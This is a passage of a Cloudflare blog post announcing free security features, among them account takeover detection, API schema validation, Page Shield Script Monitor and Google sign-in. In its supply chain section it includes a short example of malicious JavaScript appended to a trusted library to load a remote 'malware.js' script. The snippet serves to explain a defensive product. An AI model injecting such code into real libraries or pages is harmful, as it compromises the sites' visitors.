are providing threat intelligence and more than 10 new security features for free to all of our customers. Whether you are using Cloudflare to <a href=\"https://www.cloudflare.com/learning/security/glossary/website-security-checklist/\">protect your website</a>, your home network, or your office, you will find something useful that you can start using with just a few clicks.</p><p>These features are focused around some of the largest growing concerns in cybersecurity, including <a href=\"https://www.cloudflare.com/zero-trust/solutions/account-takeover-prevention/\"><u>account takeover attacks</u></a>, <a href=\"https://blog.cloudflare.com/tag/supply-chain-attacks/\"><u>supply chain attacks</u></a>, <a href=\"https://www.cloudflare.com/learning/security/api/what-is-api-security/\"><u>attacks against API endpoints</u></a>, <a href=\"https://www.cloudflare.com/network-services/products/magic-network-monitoring/\"><u>network visibility</u></a>, and <a href=\"https://www.cloudflare.com/learning/access-management/what-is-dlp/\"><u>data leaks from your network</u></a>.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"more-security-for-everyone\">More security for everyone</h2>\n <a href=\"#more-security-for-everyone\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>You can read more about each one of these features in the sections below, but we wanted to provide a short summary upfront.</p><p><b>If you are a cyber security enthusiast: </b>you can head over to our <a href=\"http://cloudflare.com/threat-intelligence/\"><u>new Cloudforce One threat intelligence website</u></a> to find out about threat actors, attack campaigns, and other Internet-wide security issues.</p><p><b>If you are a website owner</b>: starting today, all free plans will get access to <a href=\"https://developers.cloudflare.com/waf/analytics/security-analytics/\"><u>Security Analytics</u></a> for their zones. Additionally, we are also making <a href=\"https://developers.cloudflare.com/dns/additional-options/analytics/\"><u>DNS Analytics</u></a> available to everyone via GraphQL.</p><p>Once you have visibility, it’s all about distinguishing good from malicious traffic. All customers get access to always-on <a href=\"https://developers.cloudflare.com/waf/managed-rules/check-for-exposed-credentials/\"><u>account takeover attack detection</u></a>, <a href=\"https://developers.cloudflare.com/api-shield/security/schema-validation/\"><u>API schema validation</u></a> to enforce a positive security model on their API endpoints, and <a href=\"https://developers.cloudflare.com/page-shield/detection/monitor-connections-scripts/\"><u>Page Shield script monitor</u></a> to provide visibility into the third party assets that you are loading from your side and that could be used to perform supply chain-based attacks.</p><p><b>If you are using Cloudflare to protect your people and network</b>: We are going to bundle a number of our Cloudflare One products into a new free offering. This bundle will include the current <a href=\"https://www.cloudflare.com/plans/zero-trust-services/\"><u>Zero Trust products we offer for free</u></a>, and new products like <a href=\"https://www.cloudflare.com/network-services/products/magic-network-monitoring/\"><u>Magic Network Monitoring</u></a> for network visibility, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-dlp/\"><u>Data Loss Prevention</u></a> for sensitive data, and <a href=\"https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/\"><u>Digital Experience Monitoring</u></a> for measuring network connectivity and performance. Cloudflare is the only vendor to offer free versions of these types of products.</p><p><b>If you are a new user: </b>We have new options for authentication. Starting today, we are introducing the option to use Google Authentication to sign up and log into Cloudflare, which will make it easier for some of our customers to login, and reduce dependence on remembering passwords, consequently reducing the risk of their Cloudflare account becoming compromised.</p><p>And now in more detail:</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"threat-intelligence-analytics\">Threat Intelligence & Analytics</h2>\n <a href=\"#threat-intelligence-analytics\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <div class=\"flex anchor relative\">\n <h3 id=\"cloudforce-one\">Cloudforce One</h3>\n <a href=\"#cloudforce-one\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Our threat research and operations team, <a href=\"https://blog.cloudflare.com/introducing-cloudforce-one-threat-operations-and-threat-research/\"><u>Cloudforce One</u></a>, is excited to announce the launch of a <a href=\"http://cloudflare.com/threat-intelligence/\"><u>freely accessible dedicated threat intelligence website</u></a>. We will use this site to publish both technical and executive-oriented information on the latest threat actor activity and tactics, as well as insights on emerging malware, vulnerabilities, and attacks.</p><p>We are also publishing two new pieces of threat intelligence, along with a promise for more. Head over to the <a href=\"http://cloudflare.com/threat-intelligence/\"><u>new website</u></a> here to see the latest research, covering an advanced threat actor targeting regional organizations across South and East Asia, as well as the rise of double brokering freight fraud. Future research and data sets will also become available as a new<a href=\"https://developers.cloudflare.com/security-center/indicator-feeds/\"> <u>Custom Indicator Feed</u></a><u> </u>for customers.</p><p><a href=\"http://cloudflare.com/threat-intelligence/\"><u>Subscribe</u></a> to receive email notifications of future threat research.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"security-analytics\">Security Analytics</h3>\n <a href=\"#security-analytics\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Security Analytics gives you a security lens across <b>all</b> of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated. This means that, in addition to using Security Events to view security actions taken by our Application Security suite of products, you can use Security Analytics to review all of your traffic for anomalies or strange behavior and then use the insights gained to craft precise mitigation rules based on your specific traffic patterns. Starting today, we are making this lens available to customers across all plans.</p><p>Free and Pro plan users will now have access to <a href=\"https://dash.cloudflare.com/?to=/:account/:zone/security/analytics\"><u>a new dashboard</u></a> for Security Analytics where you can view a high level overview of your traffic in the Traffic Analysis chart, including the ability to group and filter so that you can zero in on anomalies with ease. You can also see top statistics and filter across a variety of dimensions, including countries, source browsers, source operating systems, HTTP versions, SSL protocol version, cache status, and security actions.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oBM7D78NDErNNgIPRSJN9/055440bfd256bb2f128d5d99858a5748/image6.jpg\" alt=\"\" class=\"kg-image\" width=\"1617\" height=\"667\" loading=\"lazy\"/>\n </figure>\n <div class=\"flex anchor relative\">\n <h3 id=\"dns-analytics\">DNS Analytics</h3>\n <a href=\"#dns-analytics\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Every user on Cloudflare now has access to <a href=\"https://dash.cloudflare.com/?to=/:account/:zone/dns/analytics\"><u>the new and improved DNS Analytics dashboard</u></a> as well as access to the new DNS Analytics dataset in our <a href=\"https://developers.cloudflare.com/analytics/graphql-api/\"><u>powerful GraphQL API</u></a>. Now, you can easily analyze the DNS queries to your domain(s), which can be useful for troubleshooting issues, detecting patterns and trends, or generating usage reports by applying powerful filters and breaking out DNS queries by source.</p><p>With the <a href=\"https://blog.cloudflare.com/foundation-dns-launch\"><u>launch of Foundation DNS</u></a>, we introduced new DNS Analytics based on GraphQL, but these analytics were previously only available for zones using <a href=\"https://developers.cloudflare.com/dns/foundation-dns/advanced-nameservers/\"><u>advanced nameservers</u></a>. However, due to the deep insight these analytics provide, we felt this feature was something we should make available to everyone. Starting today, the new DNS Analytics based on GraphQL can be accessed on every zone using Cloudflare’s Authoritative DNS service under Analytics in the DNS section.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3LJ4aIFB4pHhHtWeWzYlgV/96c701d7c826a92e1220c7cd85f40f88/image5.png\" alt=\"\" class=\"kg-image\" width=\"1482\" height=\"928\" loading=\"lazy\"/>\n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"application-threat-detection-and-mitigation\">Application threat detection and mitigation</h2>\n <a href=\"#application-threat-detection-and-mitigation\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <div class=\"flex anchor relative\">\n <h3 id=\"account-takeover-detection\">Account takeover detection</h3>\n <a href=\"#account-takeover-detection\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><a href=\"https://techreport.com/statistics/cybersecurity/password-reuse-statistics/\"><u>65% of Internet users</u></a> are vulnerable to account takeover (ATO) due to password reuse and the rising frequency of large data breaches. Helping build a better Internet involves making critical account protection easy and accessible for everyone.</p><p>Starting today, we’re providing robust account security that helps prevent credential stuffing and other ATO attacks to everyone for free — from individual users to large enterprises — making enhanced features like Leaked Credential Checks and ATO detections available at no cost. </p><p>These updates include automatic detection of logins, brute force attack prevention with minimal setup, and access to a comprehensive leaked credentials database of over 15 billion passwords which will contain leaked passwords from the <a href=\"https://haveibeenpwned.com/\"><u>Have I been Pwned (HIBP)</u></a> service in addition to our own database. Customers can take action on the leaked credential requests through Cloudflare’s WAF features like <a href=\"https://developers.cloudflare.com/waf/rate-limiting-rules\"><u>Rate Limiting Rules</u></a> and <a href=\"https://developers.cloudflare.com/waf/custom-rules/\"><u>Custom Rules</u></a>, or they can take action at the origin by enforcing <a href=\"https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/\"><u>multi-factor authentication (MFA)</u></a> or requiring a password reset based on a header sent to the origin.</p><p>Setup is simple: Free plan users get automatic detections, while paid users can activate the new features via one click in the Cloudflare dashboard. For more details on setup and configuration, refer to our <a href=\"https://developers.cloudflare.com/waf/detections/leaked-credentials/\"><u>documentation</u></a> and use it today!</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"api-schema-validation\">API schema validation</h3>\n <a href=\"#api-schema-validation\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>API traffic <a href=\"https://www.cloudflare.com/2024-api-security-management-report/\"><u>comprises more than half</u></a> of the dynamic traffic on the Cloudflare network. The popularity of APIs has opened up a whole new <a href=\"https://cyware.com/news/unprotected-database-belonging-to-justdial-exposes-personal-information-of-almost-100-million-users-1d5bb7a9\"><u>set</u></a> of <a href=\"https://venturebeat.com/security/t-mobile-data-breach-shows-api-security-cant-be-ignored/\"><u>attack</u></a> <a href=\"https://venturebeat.com/security/twitter-breach-api-attack/\"><u>vectors</u></a>. Cloudflare API Shield’s <a href=\"https://developers.cloudflare.com/api-shield/security/schema-validation/\"><u>Schema Validation</u></a> is the first step to <a href=\"https://blog.cloudflare.com/api-gateway/\"><u>strengthen</u></a> your API security in the face of these new threats.</p><p>Now for the first time, <i>any</i> Cloudflare customer can use Schema Validation to ensure only valid requests to their API make it through to their origin.</p><p>This functionality stops accidental information disclosure due to bugs, stops developers from haphazardly exposing endpoints through a non-standard process, and automatically blocks zombie APIs as your API inventory is kept up-to-date as part of your CI/CD process.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3PMaRYLTwff6D7sdXRysJ7/728deb51cbec996c6741c428639b6900/image2.png\" alt=\"\" class=\"kg-image\" width=\"1557\" height=\"1351\" loading=\"lazy\"/>\n </figure><p>We suggest you use Cloudflare’s <a href=\"https://developers.cloudflare.com/api/operations/api-shield-schema-validation-post-schema\"><u>API</u></a> or Terraform <a href=\"https://developers.cloudflare.com/api-shield/reference/terraform/\"><u>provider</u></a> to add endpoints to Cloudflare API Shield and update the schema after your code’s been released as part of your post-build CI/CD process. That way, API Shield becomes a go-to API inventory tool, and <a href=\"https://developers.cloudflare.com/api-shield/security/schema-validation/\"><u>Schema Validation</u></a> will take care of requests towards your API that you aren’t expecting.</p><p>While APIs are all about integrating with third parties, sometimes integrations are done by loading libraries directly into your application. Next up, we’re helping secure more of the web by protecting users from malicious third party scripts that steal sensitive information from inputs on your pages.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"supply-chain-attack-prevention\">Supply chain attack prevention</h3>\n <a href=\"#supply-chain-attack-prevention\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Modern web apps improve their users’ experiences and cut down on developer time through the use of third party JavaScript libraries. Because of its privileged access level to everything on the page, a compromised third party JavaScript library can surreptitiously <a href=\"https://www.cloudflare.com/learning/security/what-is-data-exfiltration/\">exfiltrate sensitive information</a> to an attacker without the end user or site administrator realizing it’s happened.</p><p>To counter this threat, we introduced Page Shield <a href=\"https://blog.cloudflare.com/introducing-page-shield/\"><u>three years ago</u></a>. We are now releasing Page Shield’s Script Monitor for free to all our users.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5b6sxHcCLgIAHfb6Qub6NR/ae2f22ed1d2126804a5bc6e333d64fed/image3.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"1843\" loading=\"lazy\"/>\n </figure><p>With <a href=\"https://dash.cloudflare.com/?to=/:account/:zone/security/page-shield\"><u>Script Monitor</u></a>, you’ll see <i>all</i> JavaScript assets loaded on the page, not just the ones your developers included. This visibility includes scripts dynamically loaded by other scripts! Once an attacker compromises the library, it is trivial to add a new malicious script without changing the context of the original HTML by instead including new code in the existing included JavaScript asset:</p>\n <pre class=\"language-JavaScript\"><code class=\"language-JavaScript\">// Original library code (trusted)\nfunction someLibraryFunction() {\n // useful functionality here\n}\n\n// Malicious code added by the attacker\nlet malScript = document.createElement(&#039;script&#039;);\nmalScript.src = &#039;https://example.com/malware.js&#039;;\ndocument.body.appendChild(malScript);</pre></code>\n <p>Script Monitor was essential when the <a href=\"https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk\"><u>news broke of the pollyfill.io library</u></a> changing ownership. Script Monitor users had immediate visibility to the scripts loaded on their sites and could quickly and easily understand if they were at risk.</p><p>We’re happy to extend visibility of these scripts to as much of the web as we can by releasing Script Monitor for all customers. Find out how you can get started <a href=\"https://developers.cloudflare.com/page-shield/detection/monitor-connections-scripts/\"><u>here in the docs</u></a>.</p><p>Existing users of Page Shield can immediately filter on the monitored data, knowing whether polyfill.io (or any other library) is used by their app. In addition, we <a href=\"https://blog.cloudflare.com/automatically-replacing-polyfill-io-links-with-cloudflares-mirror-for-a-safer-internet/\"><u>built a polyfill.io rewrite</u></a> in response to the compromised service, which was automatically enabled for Free plans in June 2024.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"turnstile-as-a-google-firebase-extension\">Turnstile as a Google Firebase extension </h3>\n <a href=\"#turnstile-as-a-google-firebase-extension\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We&#39;re excited to announce the <a href=\"https://developers.cloudflare.com/turnstile/extensions/google-firebase/\"><u>Cloudflare Turnstile App Check Provider for Google Firebase</u></a>, which offers seamless integration without the need for manual setup. This new extension allows developers building mobile or web applications on Firebase to protect their projects from bots using Cloudflare’s CAPTCHA alternative. By leveraging Turnstile&#39;s bot detection and challenge capabilities, you can ensure that only authentic human visitors interact with your Firebase backend services, enhancing both security and user experience. Cloudflare Turnstile, a privacy-focused CAPTCHA alternative, differentiates between humans and bots without disrupting the user experience. Unlike traditional CAPTCHA solutions, which users often abandon, Turnstile operates invisibly and provides various modes to ensure frictionless user interactions.</p><p>The Firebase App Check extension for Turnstile is easy to integrate, allowing developers to quickly enhance app security with minimal setup. This extension is also free with unlimited usage with Turnstile’s free tier. By combining the strengths of Google Firebase&#39;s backend services and Cloudflare’s Turnstile, developers can offer a secure and seamless experience for their users. </p>\n <div class=\"flex anchor relative\">\n <h2 id=\"cloudflare-one\">Cloudflare One</h2>\n <a href=\"#cloudflare-one\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><a href=\"https://www.cloudflare.com/zero-trust/\"><u>Cloudflare One</u></a> is a comprehensive <a href=\"https://www.cloudflare.com/learning/access-management/what-is-sase/\"><u>Secure Access Service Edge (SASE)</u></a> platform designed to protect and connect people, apps, devices, and networks across the Internet. It combines services such as Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), and more into a single solution. Cloudflare One can help everyone secure people and networks, manage access control, protect against cyber threats, safeguard their data, and improve the performance of network traffic by routing it through Cloudflare’s global network. It replaces traditional security measures by offering a cloud-based approach to secure and streamline access to corporate resources.</p><p>Everyone now has free access to four new products that have been added to Cloudflare One over the past two years:</p><ul><li><p><a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-casb/\"><u>Cloud Access Security Broker (CASB)</u></a> for mitigating SaaS application risk<i>.</i></p></li><li><p><a href=\"https://www.cloudflare.com/learning/access-management/what-is-dlp/\"><u>Data Loss Prevention (DLP)</u></a> for protecting sensitive data from leaving your network and SaaS applications<i>.</i></p></li><li><p><a href=\"https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/\"><u>Digital Experience Monitoring</u></a> for seeing a user’s experience when they are on any network.</p></li><li><p><a href=\"https://www.cloudflare.com/network-services/products/magic-network-monitoring/\"><u>Magic Network Monitoring</u></a> for seeing all the traffic that flows through your network<i>.</i></p></li></ul><p>This is in addition to the existing network security products already in the Cloudflare One platform:</p><ul><li><p><a href=\"https://www.cloudflare.com/learning/access-management/what-is-ztna/\"><u>Access</u></a> for verifying users’ identity and only letting them use the applications they’re meant to be using.</p></li><li><p><a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/\"><u>Gateway</u></a> for protecting network traffic that both goes out to the public Internet and into your private network.</p></li><li><p><a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/\"><u>Cloudflare Tunnel</u></a>, our app connectors, which includes both cloudflared and WARP Connector for connecting different applications, servers, and private networks to Cloudflare’s network.</p></li><li><p><a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/\"><u>Cloudflare WARP</u></a>, our device agent, for securely sending traffic from a laptop or mobile device to the Internet.</p></li></ul><p>Anyone with a Cloudflare account will automatically receive 50 free seats across all of these products in their Cloudflare One organization. Visit our <a href=\"https://www.cloudflare.com/plans/zero-trust-services/\"><u>Zero Trust &amp; SASE plans page</u></a> for more information about our free products and to learn about our Pay-as-you-go and Contract plans for teams above 50 members.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"authenticating-with-google\">Authenticating with Google</h2>\n <a href=\"#authenticating-with-google\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The Cloudflare dashboard itself has become a vital resource that needs to be protected, and we spend a lot of time ensuring Cloudflare user accounts do not get compromised.</p><p>To do this, we have increased security by adding additional authentication methods including app-based two-factor authentication (2FA), passkeys, SSO, and Sign in with Apple. Today we’re adding the ability to sign up and sign in with a Google account.</p><p>Cloudflare supports several authentication workflows tailored to different use cases. While SSO and passkeys are the preferred and most secure methods of authentication, we believe that providing authentication factors that are stronger than passwords will fill a gap and raise overall average security for our users. Signing in with Google makes life easier for our users and prevents them from having to remember yet another password when they’re already browsing the web with a Google identity.</p><p>Sign in with Google is based on the <a href=\"https://oauth.net/2/\"><u>OAuth 2.0</u></a> specification, and allows Google to securely share identifying information about a given identity while ensuring that it is Google providing this information, preventing any malicious entities from impersonating Google.</p><p>This means that we can delegate authentication to Google, preventing zero knowledge attacks directly on this Cloudflare identity.</p><p>Upon coming to the Cloudflare Sign In page, you will be presented with the button below. Clicking on it will allow you to register for Cloudflare, and once you are registered, it will allow you to sign in without typing in a password, using any existing protections you have set on your Google account.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image 